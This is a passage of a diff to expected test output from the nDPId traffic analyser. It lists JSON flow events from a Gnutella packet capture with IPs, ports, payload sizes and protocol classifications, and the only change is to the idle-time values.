+00570{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":68109,"flow_last_seen":77122,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.36.249.91","src_port":50229,"dst_port":64920,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00555{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":68109,"flow_last_seen":77122,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.36.249.91","src_port":50229,"dst_port":64920,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":789,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":493287,"flow_last_seen":493287,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"42.98.115.128","src_port":28681,"dst_port":23458,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":789,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":493287,"flow_last_seen":493287,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"42.98.115.128","src_port":28681,"dst_port":23458,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":795,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":551890,"flow_last_seen":551890,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"213.120.26.86","src_port":28681,"dst_port":29946,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":795,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":551890,"flow_last_seen":551890,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"213.120.26.86","src_port":28681,"dst_port":29946,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":61977,"flow_last_seen":61977,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.157.143.201","src_port":50195,"dst_port":29762,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":61977,"flow_last_seen":61977,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.157.143.201","src_port":50195,"dst_port":29762,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":71204,"flow_last_seen":80232,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.7.252.192","src_port":50246,"dst_port":45685,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00556{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":71204,"flow_last_seen":80232,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.7.252.192","src_port":50246,"dst_port":45685,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":61977,"flow_last_seen":61977,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.157.143.201","src_port":50195,"dst_port":29762,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":61977,"flow_last_seen":61977,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.157.143.201","src_port":50195,"dst_port":29762,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":71204,"flow_last_seen":80232,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.7.252.192","src_port":50246,"dst_port":45685,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00556{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":71204,"flow_last_seen":80232,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.7.252.192","src_port":50246,"dst_port":45685,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":755,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":371838,"flow_last_seen":491980,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"83.134.107.32","src_port":28681,"dst_port":38836,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":755,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":371838,"flow_last_seen":491980,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"83.134.107.32","src_port":28681,"dst_port":38836,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":65062,"flow_last_seen":74092,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.234.18.166","src_port":50210,"dst_port":61404,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":65062,"flow_last_seen":74092,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.234.18.166","src_port":50210,"dst_port":61404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":65062,"flow_last_seen":74092,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.234.18.166","src_port":50210,"dst_port":61404,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":65062,"flow_last_seen":74092,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.234.18.166","src_port":50210,"dst_port":61404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":72853,"flow_last_seen":551891,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.65.70.197","src_port":28681,"dst_port":21693,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":72853,"flow_last_seen":551891,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.65.70.197","src_port":28681,"dst_port":21693,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":64032,"flow_last_seen":73065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"114.46.139.171","src_port":50205,"dst_port":52120,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":64032,"flow_last_seen":73065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"114.46.139.171","src_port":50205,"dst_port":52120,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":64032,"flow_last_seen":73065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"114.46.139.171","src_port":50205,"dst_port":52120,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":64032,"flow_last_seen":73065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"114.46.139.171","src_port":50205,"dst_port":52120,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":772,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490659,"flow_last_seen":551701,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.192.231.237","src_port":28681,"dst_port":9676,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":772,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490659,"flow_last_seen":551701,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.192.231.237","src_port":28681,"dst_port":9676,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":71539,"flow_last_seen":551890,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.169.2.153","src_port":28681,"dst_port":52414,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -4185,65 +4185,65 @@ 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":72853,"flow_last_seen":551891,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"77.197.111.186","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":770,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490659,"flow_last_seen":490846,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"97.83.183.148","src_port":28681,"dst_port":8890,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":770,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490659,"flow_last_seen":490846,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"97.83.183.148","src_port":28681,"dst_port":8890,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":87670,"flow_last_seen":96685,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"94.134.154.158","src_port":50281,"dst_port":54130,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":87670,"flow_last_seen":96685,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"94.134.154.158","src_port":50281,"dst_port":54130,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":87670,"flow_last_seen":96685,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"94.134.154.158","src_port":50281,"dst_port":54130,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":87670,"flow_last_seen":96685,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"94.134.154.158","src_port":50281,"dst_port":54130,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00628{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":783,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":490916,"flow_last_seen":490916,"flow_idle_time":120000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"65.182.231.232","dst_ip":"10.0.2.15","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":66079,"flow_last_seen":75108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.121.165.12","src_port":50219,"dst_port":55376,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":66079,"flow_last_seen":75108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.121.165.12","src_port":50219,"dst_port":55376,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00800{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"finished","flow_packets_processed":312,"flow_first_seen":88704,"flow_last_seen":593713,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":19428,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"75.133.101.93","src_port":50285,"dst_port":52367,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00916{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"finished","flow_packets_processed":1251,"flow_first_seen":114930,"flow_last_seen":537520,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1051202,"flow_avg_l4_payload_len":840,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"189.147.72.83","src_port":50328,"dst_port":26108,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":66079,"flow_last_seen":75108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.121.165.12","src_port":50219,"dst_port":55376,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":66079,"flow_last_seen":75108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.121.165.12","src_port":50219,"dst_port":55376,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00800{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"finished","flow_packets_processed":312,"flow_first_seen":88704,"flow_last_seen":593713,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":19428,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"75.133.101.93","src_port":50285,"dst_port":52367,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00916{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"finished","flow_packets_processed":1251,"flow_first_seen":114930,"flow_last_seen":537520,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1051202,"flow_avg_l4_payload_len":840,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"189.147.72.83","src_port":50328,"dst_port":26108,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":82060,"flow_last_seen":493283,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"115.69.62.99","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 